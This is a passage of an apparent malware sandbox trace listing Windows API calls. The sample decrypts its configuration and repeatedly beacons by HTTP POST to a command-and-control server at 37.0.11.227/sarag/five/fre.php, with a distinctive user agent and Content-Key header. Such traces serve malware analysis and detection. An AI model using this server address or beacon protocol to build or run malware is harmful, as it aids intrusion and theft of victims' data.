hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab460 | out: hHeap=0x690000) returned 1 [0346.248] GetProcessHeap () returned 0x690000 [0346.249] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0346.251] GetProcessHeap () returned 0x690000 [0346.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0346.251] GetProcessHeap () returned 0x690000 [0346.251] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0346.251] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19ec) returned 0xc98 [0346.253] Sleep (dwMilliseconds=0xea60) [0346.254] GetProcessHeap () returned 0x690000 [0346.254] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0346.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.256] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0346.262] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.263] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0346.275] GetProcessHeap () returned 0x690000 [0346.275] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0346.276] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.277] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0346.286] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.286] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0346.287] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.288] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0346.288] GetProcessHeap () returned 0x690000 [0346.288] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0346.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.289] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0346.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.291] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0346.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.292] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0346.292] GetProcessHeap () returned 0x690000 [0346.292] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0346.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.297] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0346.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.298] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0346.298] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.299] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0346.300] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.300] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0346.300] GetProcessHeap () returned 0x690000 [0346.300] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0346.300] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0346.301] GetProcessHeap () returned 0x690000 [0346.302] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0346.302] GetProcessHeap () returned 0x690000 [0346.302] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0346.302] GetProcessHeap () returned 0x690000 [0346.303] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0346.303] GetProcessHeap () returned 0x690000 [0346.303] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0346.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.306] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0346.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.312] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0346.321] GetProcessHeap () returned 0x690000 [0346.321] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88e0 [0346.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.323] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a88e0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0346.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.324] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0346.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.325] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0346.325] GetProcessHeap () returned 0x690000 [0346.326] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88e0 | out: hHeap=0x690000) returned 1 [0346.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.329] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0346.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.330] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0346.331] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.332] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0346.332] GetProcessHeap () returned 0x690000 [0346.332] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0346.332] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.333] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0346.334] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.334] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0346.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.335] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0346.336] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.337] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0346.337] GetProcessHeap () returned 0x690000 [0346.337] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0346.337] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0346.337] GetProcessHeap () returned 0x690000 [0346.337] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab370 [0346.337] socket (af=2, type=1, protocol=6) returned 0xc9c [0346.337] connect (s=0xc9c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0346.365] FreeAddrInfoW (pAddrInfo=0x6a31f0*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0346.365] GetProcessHeap () returned 0x690000 [0346.365] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0346.365] GetProcessHeap () returned 0x690000 [0346.365] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0346.366] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0346.367] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0346.367] GetProcessHeap () returned 0x690000 [0346.367] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afec0 [0346.367] GetProcessHeap () returned 0x690000 [0346.367] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0346.368] GetProcessHeap () returned 0x690000 [0346.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0346.368] GetProcessHeap () returned 0x690000 [0346.368] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0346.373] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0346.374] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0346.374] GetProcessHeap () returned 0x690000 [0346.374] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0346.374] GetProcessHeap () returned 0x690000 [0346.375] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0346.375] send (s=0xc9c, buf=0x6ad508*, len=242, flags=0) returned 242 [0346.376] send (s=0xc9c, buf=0x6aba40*, len=159, flags=0) returned 159 [0346.376] GetProcessHeap () returned 0x690000 [0346.376] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0346.376] recv (in: s=0xc9c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0346.446] GetProcessHeap () returned 0x690000 [0346.446] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0346.450] GetProcessHeap () returned 0x690000 [0346.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0346.450] GetProcessHeap () returned 0x690000 [0346.450] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afec0 | out: hHeap=0x690000) returned 1 [0346.450] GetProcessHeap () returned 0x690000 [0346.451] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0346.451] closesocket (s=0xc9c) returned 0 [0346.452] GetProcessHeap () returned 0x690000 [0346.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab370 | out: hHeap=0x690000) returned 1 [0346.452] GetProcessHeap () returned 0x690000 [0346.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0346.453] GetProcessHeap () returned 0x690000 [0346.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0346.453] GetProcessHeap () returned 0x690000 [0346.453] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0346.454] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19f0) returned 0xc9c [0346.457] Sleep (dwMilliseconds=0xea60) [0346.459] GetProcessHeap () returned 0x690000 [0346.460] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0346.460] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.461] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0346.470] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.470] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0346.478] GetProcessHeap () returned 0x690000 [0346.478] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0346.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.482] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0346.483] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.483] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0346.484] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.484] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0346.484] GetProcessHeap () returned 0x690000 [0346.485] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0346.485] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.486] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0346.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.495] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0346.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.495] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0346.496] GetProcessHeap () returned 0x690000 [0346.496] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0346.496] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.496] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0346.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.497] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0346.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.498] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0346.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.499] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0346.499] GetProcessHeap () returned 0x690000 [0346.499] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0346.499] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0346.499] GetProcessHeap () returned 0x690000 [0346.500] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0346.500] GetProcessHeap () returned 0x690000 [0346.500] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0346.500] GetProcessHeap () returned 0x690000 [0346.501] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0346.502] GetProcessHeap () returned 0x690000 [0346.502] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0346.506] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.507] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0346.511] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.511] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af078) returned 1 [0346.519] GetProcessHeap () returned 0x690000 [0346.520] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0346.520] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.521] CryptImportKey (in: hProv=0x6af078, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0346.521] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.522] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0346.523] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.523] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0346.523] GetProcessHeap () returned 0x690000 [0346.523] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0346.526] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.527] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0346.528] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.528] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0346.529] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.529] CryptReleaseContext (hProv=0x6af078, dwFlags=0x0) returned 1 [0346.529] GetProcessHeap () returned 0x690000 [0346.529] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0346.530] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.530] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0346.531] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.539] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0346.544] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.545] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0346.546] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0346.546] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0346.546] GetProcessHeap () returned 0x690000 [0346.546] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0346.546] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0346.547] GetProcessHeap () returned 0x690000 [0346.547] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab490 [0346.547] socket (af=2, type=1, protocol=6) returned 0xca0 [0346.548] connect (s=0xca0, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0346.577] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0346.577] GetProcessHeap () returned 0x690000 [0346.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0346.577] GetProcessHeap () returned 0x690000 [0346.577] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0346.578] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0346.579] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0346.579] GetProcessHeap () returned 0x690000 [0346.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0346.579] GetProcessHeap () returned 0x690000 [0346.579] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0346.579] GetProcessHeap () returned 0x690000 [0346.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0346.580] GetProcessHeap () returned 0x690000 [0346.580] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0346.580] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0346.581] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0346.581] GetProcessHeap () returned 0x690000 [0346.581] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0346.581] GetProcessHeap () returned 0x690000 [0346.582] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0346.582] send (s=0xca0, buf=0x6ad508*, len=242, flags=0) returned 242 [0346.582] send (s=0xca0, buf=0x6aba40*, len=159, flags=0) returned 159 [0346.585] GetProcessHeap () returned 0x690000 [0346.585] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0346.585] recv (in: s=0xca0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0346.685] GetProcessHeap () returned 0x690000 [0346.686] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0346.686] GetProcessHeap () returned 0x690000 [0346.686] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0346.686] GetProcessHeap () returned 0x690000 [0346.687] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0346.687] GetProcessHeap () returned 0x690000 [0346.687] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0346.687] closesocket (s=0xca0) returned 0 [0346.710] GetProcessHeap () returned 0x690000 [0346.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab490 | out: hHeap=0x690000) returned 1 [0346.710] GetProcessHeap () returned 0x690000 [0346.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0346.710] GetProcessHeap () returned 0x690000 [0346.710] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0346.710] GetProcessHeap () returned 0x690000 [0346.711] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0346.711] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x19f4) returned 0xca0 [0346.713] Sleep (dwMilliseconds=0xea60) [0346.715] GetProcessHeap () returned 0x690000 [0346.715] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0346.716] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0346.717] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0346.726] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 Thread: id = 9 os_tid = 